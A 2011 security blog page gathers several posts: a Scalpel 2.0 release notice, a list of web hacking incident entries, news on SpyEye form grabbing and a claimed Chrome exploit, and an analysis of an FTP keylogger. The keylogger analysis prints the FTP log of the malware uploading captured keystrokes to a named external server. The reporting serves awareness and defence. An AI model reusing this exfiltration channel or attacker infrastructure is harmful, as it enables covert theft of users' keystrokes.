Wednesday, May 11, 2011

Mac memory reader

Free Tools for Mac and IOS Forensics

Scalpel 2.0 is here with lots of new features

Scalpel file carver, version 2.0 - has the first public release in almost five years. There are a slew of performance enhancements and new features, focusing on improved carving accuracy and performance, and even more goodness is on the
way.

Just some of the new features include:


  • Support for TRE-based regular expressions for headers and footers
  • Support for minimum carve sizes for recovered files
  • Parallel architecture to take full advantage of multicore processors
  • Beta support for NVIDIA CUDA-based GPU acceleration of header / footer searches
  • An asynchronous IO architecture for significantly faster IO throughput
  • Support for 32 and 64-bit Linux, Windows XP, Vista and 7, and OSX


In the coming weeks will post some ways to put these new features to
good use, as well as for the introduction of some even newer
functionality.


The new version can be downloaded from:http://www.digitalforensicssolutions.com/Scalpel/
The download file contains pre-compiled Windows binaries as well as the project
source code.  If you find any bugs while using Scalpel please send an
email to scalpel at digitalforensicssolutions dot com. If you want to send
comments to the authors, you can  contact Golden Richard
(golden@cs.uno.edu / @nolaforensix ) or Lodovico Marziale ( vico@digdeeply.com / http://www.linkedin.com/in/lodovicomarziale ).
If you are interested in the GPU research that went into this project, read the published paper at DFRWS that discusses both the CUDA architecture as well as
the integration of it into Scalpel. It can be found here

Latest Web Hacking Incident Database (WHID) Entries

These are the lastest entries added by SpiderLabs to the Web Application Security Consortium (WASC) Web Hacking Incident Database (WHID) Project.

WHID 2011-84:Hackers access personal info of Lancaster County students


Entry Title: WHID 2011-84:Hackers access personal info of Lancaster County students
WHID ID: 2011-84
Date Occurred: April 20, 2011
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Leakage of Information
Attacked Entity Field: Education
Attacked Entity Geography: South Carolina
Incident Description: LANCASTER, S.C. -- The Lancaster County School District says hackers may have stolen the personal information of 25,000 students in the district's database.
Schools officials are now trying to contact everyone who might have been affected. Information stored in the database goes back 10 years.
Mass Attack: No
Reference: http://www.wcnc.com/news/local/Personal-Information-of-Thousands-exposed-to-Internet-Hackers-120316064.html
Attack Source Geography:
Number of Records: 25,000



WHID 2011-83: Minn. man accused of hacking Facebook accounts


Entry Title: WHID 2011-83: Minn. man accused of hacking Facebook accounts
WHID ID: 2011-83
Date Occurred: April 21, 2011
Attack Method: Social Engineering
Application Weakness: Insufficient Password Recovery
Outcome: Account Takeover
Attacked Entity Field: Web 2.0
Attacked Entity Geography:
Incident Description: Prosecutors have accused a Minnesota man of hacking into other people's Facebook and other computer accounts and stealing photos of women to post on adult websites.
Prosecutors charged Timothy Peter Noirjean, 26, of Woodbury, with 13 counts of identity theft, alleging that from February 2010 through March 2010 he contacted women online and duped them into providing him with personal information that allowed him to hack their Facebook and other accounts. After hacking a Facebook account, prosecutors say Noirjean would pose as the owner to make contact with that person's friends and try to gain access to more computer accounts.
Read more: http://www.foxnews.com/us/2011/04/20/minn-man-accused-hacking-facebook-accounts/#ixzz1KBSiqxBX
Mass Attack: No
Reference: http://www.foxnews.com/us/2011/04/20/minn-man-accused-hacking-facebook-accounts/
Attack Source Geography:
Attacked System Technology: Facebook



WHID 2011-82: Sony fears Anonymous hack as PSN stays down


Entry Title: WHID 2011-82: Sony fears Anonymous hack as PSN stays down
WHID ID: 2011-82
Date Occurred: April 21, 2011
Attack Method: Denial of Service
Application Weakness: Insufficient Anti-automation
Outcome: Downtime
Attacked Entity Field: Entertainment
Attacked Entity Geography:
Incident Description: It's looking more likely that loose-knit 'hacktivist' collective Anonymous may have pulled off the 'biggest ever' attack on Sony's PlayStation network (PSN), as company engineers are investigating the possibility that the online gaming service has been hacked.
Mass Attack: No
Reference: http://www.thinq.co.uk/2011/4/21/sony-fears-anonymous-hack-psn-stays-down/
Attack Source Geography:



WHID 2011-81: AlArabiya.net Hacked…Again


Entry Title: WHID 2011-81: AlArabiya.net Hacked…Again
WHID ID: 2011-81
Date Occurred: April 21, 2011
Attack Method: Unknown
Application Weakness: Unknown
Outcome: Defacement
Attacked Entity Field: News
Attacked Entity Geography: Saudi Arabia
Incident Description: Being one of the region’s leading news agencies, Al-Arabiya which is part of MBC Group, the largest broadcasting company in the Middle East has been hacked by an unknown group signed only with ‘Crack_Man’ stating it has been ‘powered morocco’.
The hacked website comes in a long lasting tradition of security flaws in the website leading to the recurrent event of the portal being hacked during political instability hits the region usually as an expression of disagreeing with what many consider the news agency’s Western oriented liberal point of view.
Mass Attack: No
Reference: http://thenextweb.com/me/2011/04/21/alarabiya-net-hacked-again/
Attack Source Geography:



WHID 2011-80: Ashampoo server hacked, customer names and e-mail addresses stolen


Entry Title: WHID 2011-80: Ashampoo server hacked, customer names and e-mail addresses stolen
WHID ID: 2011-80
Date Occurred: April 21, 2011
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Leakage of Information
Attacked Entity Field: Retail
Attacked Entity Geography:
Incident Description: Rolf Hilchner, CEO of Ashampoo, has posted on the company’s website explaining exactly what has happened. Apparently hackers managed to break into one of Ashampoo’s servers that held customer data. There was a hole in their security and by using it Ashampoo customer names and e-mail addresses have been taken, but no payment and billing information was accessed.
Mass Attack: No
Reference: http://www.geek.com/articles/geek-pick/ashampoo-server-hacked-customer-names-and-e-mail-addresses-stolen-20110421/
Attack Source Geography:
Additional Link: http://www.ashampoo.com/en/usd/dth



WHID 2011-79: Change.org Victim of DDoS Attack From China


Entry Title: WHID 2011-79: Change.org Victim of DDoS Attack From China
WHID ID: 2011-79
Date Occurred: April 19, 2011
Attack Method: Denial of Service
Application Weakness: Insufficient Anti-automation
Outcome: Downtime
Attacked Entity Field: Politics
Attacked Entity Geography:
Incident Description: Change.org, an online petitioning platform, has come under an ongoing distributed denial of service (DDoS) attack originating from China after the site hosted a call urging Chinese authorities to release artist Ai Weiwei from custody.
Mass Attack: No
Reference: http://www.pcworld.com/printable/article/id,225672/printable.html
Attack Source Geography: China



WHID 2011-78: The Children's Place, popular kid's clothing retailer, hit with database breach


Entry Title: WHID 2011-78: The Children's Place, popular kid's clothing retailer, hit with database breach
WHID ID: 2011-78
Date Occurred: April 19, 2011
Attack Method: Unknown
Application Weakness: Unknown
Outcome: Phishing
Attacked Entity Field: Retail
Attacked Entity Geography:
Incident Description: The Children's Place Retail Stores Inc. said Tuesday that its customer email address database was recently accessed by an unauthorized third party. The database is stored at an external email service provider, according to company officials. The external service provider confirmed that only email addresses were accessed and no other personal information was obtained.
Mass Attack: No
Reference: http://www.csoonline.com/article/679983/the-children-s-place-popular-kid-s-clothing-retailer-hit-with-database-breach
Attack Source Geography:



WHID 2011-77: Scottish news site hit by 'DDoS attack' in run-up to elections


Entry Title: WHID 2011-77: Scottish news site hit by 'DDoS attack' in run-up to elections
WHID ID: 2011-77
Date Occurred: April 19, 2011
Attack Method: Unknown
Application Weakness: Application Misconfiguration
Outcome: Downtime
Attacked Entity Field: Government
Attacked Entity Geography: Scotland
Incident Description: Politically-motivated hackers are thought to be behind a DDoS attack on alternative news site Newsnet Scotland, launched on Monday days before Scotland is due to vote in fiercely contested local elections.
The attack, if that's what it is, left the site unavailable from Monday afternoon into the early hours of Tuesday morning.
Mass Attack: No
Reference: http://www.theregister.co.uk/2011/04/19/scottish_news_site_ddos/
Attack Source Geography:



WHID 2011-76: Auto Trader website attacked


Entry Title: WHID 2011-76: Auto Trader website attacked
WHID ID: 2011-76
Date Occurred: April 19, 2011
Attack Method: Denial of Service
Application Weakness: Insufficient Anti-automation
Outcome: Downtime
Attacked Entity Field: Automotive
Attacked Entity Geography: USA
Incident Description: According to a story released on the Auto Trader blog page, the Auto Trader website was subject to an attack from midday on Apil 19th until the early hours of April 20th.
The attack disrupted access to the sight, causing it to run slowly or not open at all. According to the blog the attack originated from abroad. Such attacks, called denial of service, or DDOS attacks, are desig
Mass Attack: No
Reference: http://www.honestjohn.co.uk/news/buying-and-selling/2011-04/auto-trader-website-attacked/
Attack Source Geography:


WHID 2011-75: Manila Water's website hacked


Entry Title: WHID 2011-75: Manila Water's website hacked
WHID ID: 2011-75
Date Occurred: April 17, 2011
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Defacement
Attacked Entity Field: Energy
Attacked Entity Geography: Manila, Philippines
Incident Description: The website of water concessionaire Manila Water was hacked early Sunday, with visitors to the site seeing a small window indicating the breach.


WHID Analysis - looking at the html in the pages, it appears as though sql injection was the attack vector -


<script type="text/javascript">
function show_alert(){
alert("hacked! pakifix po yung blind sql po sa server nyo :D");}
</script>

Mass Attack: No
Reference: http://www.gmanews.tv/story/218014/nation/manila-waters-website-hacked
Attack Source Geography:



WHID 2011-74: Wind Power Company Hacked


Entry Title: WHID 2011-74: Wind Power Company Hacked
WHID ID: 2011-74
Date Occurred: April 18, 2011
Attack Method: Brute Force
Application Weakness: Insufficient Authentication
Outcome: Leakage of Information
Attacked Entity Field: SCADA
Attacked Entity Geography: New Mexico, USA
Incident Description: In an email interview with the IDG News Service, Bigr R, said he was a former employee of NextEra's parent company, Florida Power & Light. He said he used a bug in the Cisco Security Device Manager software used by NextEra to break into the site. "They gave to it public IP, so it was easy to hack into it through the Web," he said. "They used default passwords, which I got from one of administrators. Then I obtained level 15 priv. (superuser), and understood the topology of SCADA networks. Then it was easily to detect SCADA and turn it off."
Mass Attack: No
Reference: http://www.computerworld.com/s/article/9215881/Wind_power_company_sees_no_evidence_of_reported_hack
Attack Source Geography:



WHID 2011-73: Royal Navy hacker claims to have broken into space agency site


Entry Title: WHID 2011-73: Royal Navy hacker claims to have broken into space agency site
WHID ID: 2011-73
Date Occurred: April 18, 2011
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Leakage of Information
Attacked Entity Field: Government
Attacked Entity Geography:
Incident Description: Login credentials for database, email and other key systems that a poster claims belong to the European Space Agency were posted on a full disclosure mailing list over the weekend.
Mass Attack: No
Reference: http://www.eweekeurope.co.uk/news/european-space-agency-confirms-ftp-server-hack-26976
Attack Source Geography:

SpyEye Targets Opera, Google Chrome Users

The latest version of the SpyEye trojan includes new capability specifically designed to steal sensitive data from Windows users surfing the Internet with the Google Chrome and Opera Web browsers.

The author of the SpyEye trojan formerly sold the crimeware-building kit on a number of online cybercrime forums, but has recently limited his showroom displays to a handful of highly vetted underground communities. KrebsOnSecurity.com recently chatted with a member of one of these communities who has purchased a new version of SpyEye. Screenshots from the package show that the latest rendition comes with the option for new “form grabbing” capabilities targeting Chrome and Opera users.

SpyEye component in version 1.3.34 shows form grabbing options for Chrome and Opera

Trojans like ZeuS and SpyEye have the built-in ability to keep logs of every keystroke a victim types on his or her keyboard, but this kind of tracking usually creates too much extraneous data for the attackers, who mainly are interested in financial information such as credit card numbers and online banking credentials. Form grabbers accomplish this by stripping out any data that victims enter in specific Web site form fields, snarfing and recording that data before it can be encrypted and sent to the Web site requesting the information.

Both SpyEye and ZeuS have had the capability to do form grabbing against Internet Explorer and Firefox for some time, but this is the first time I’ve seen any major banking trojans claim the ability to target Chrome and Opera users with this feature.

Aviv Raff, CTO and co-founder of security alert service Seculert, said that both SpyEye and ZeuS work by “hooking” the “dynamic link library” or DLL files used by IE and Firefox. However, Chrome and Opera appear to use different DLLs, Raff said.

This strikes me as an incremental yet noteworthy development. Many people feel more secure using browsers like Chrome and Opera because they believe the browsers’ smaller market share makes them less of a target for cyber crooks. This latest SpyEye innovation is a good reminder that computer crooks are constantly looking for new ways to better monetize the resources they’ve already stolen. Security-by-obscurity is no substitute for good security practices and common sense: If you’ve installed a program, update it regularly; if you didn’t go looking for a program, add-on or download, don’t install it; if you no longer need a program, remove it.

Tuesday, May 10, 2011

VUPEN pwns Chrome

VUPEN Security claims to have pawned Google Chrome and has released a video prporting that claim. This effects Chrome version 11.0.696.65 and Win7 SP1 64-bit. This code that VUPEN came up with, bypasses ASLR, DEP and Sandbox. It is also silent, in that the browser does not crash after executing the payload. VUPEN claims it works on all Windows systems (x86 and 64). Chrome has survived the PWN2OWN contest for the past 3 yrs in a row.

Security VUPEN style, means VUPEN does not disclose this vuln to Google. It however will provide it to its clients and customers, enabling them to protect themselves. This in effect means, that Google may not have any way of verifying these claims, anytime soon.



This exploit is similar in nature to other browser exploits, Dude is tricked into visiting a webpage hosting exploit; Exploit gets executed, and then executes other payloads, ulimately downloading a malicious app from a remote location and dude is 0wned. Only difference here is that the malicious code somehow manages to run at medium integrity level.Duh!!! what are integrity levels. Look here for more details on this subject.

Thursday, May 5, 2011

FTP Keylogger

Rob @ myownangle has posted this FTP keylogger that is not detected by any anti-virus at this time. Did someone say Anti-Virus is effective 40% of the time. Its 0% effective against any new threats. Signture based detection is DEAD.

At the time of writing this malware, 2a61033a34be3dbbf0a3dfefdae4423c, has not been detected by any of the antivirus engines used by VirusTotal, 0 antimalware software out of 42 (0.0%) did not detected the threat.

Anyway, this is a malware (keylogger) that uses an FTP server to send out information regarding the infected machine.
It creates a directory in the FTP server (the directory is named as you PC name) and then stores information about the key pressed by the users.
The malware creates differents configuration files (.sys extension - but their are textual files and not drivers) in C:\WINDOWS\System32\drivers. These files has been used as configuration files by the malware to send out information.
It uses an FTP server to send out a file named: WinKey-[YOURCOMPUTER_NAME].html (in the directory system32).

220 ProFTPD 1.3.3d Server (ProFTPD) [69.175.121.66]
USER win32@video.x10.bz
331 Password required for win32@video.x10.bz
PASS [CONCEALED]
230 User win32@video.x10.bz logged in
....
CWD [COMPUTER_NAME]
250 CWD command successful
....
STOR WinKey-[COMPUTER_NAME].html
....

The file WinKey-[COMPUTER_NAME] contains the key pressed by the users:

......
==[notepad.exe]::[Untitled - Notepad]::[18:01:40]==
[MAIUSC]this ...... etc etc etc etc ..... TEXT TEXT TEXT .....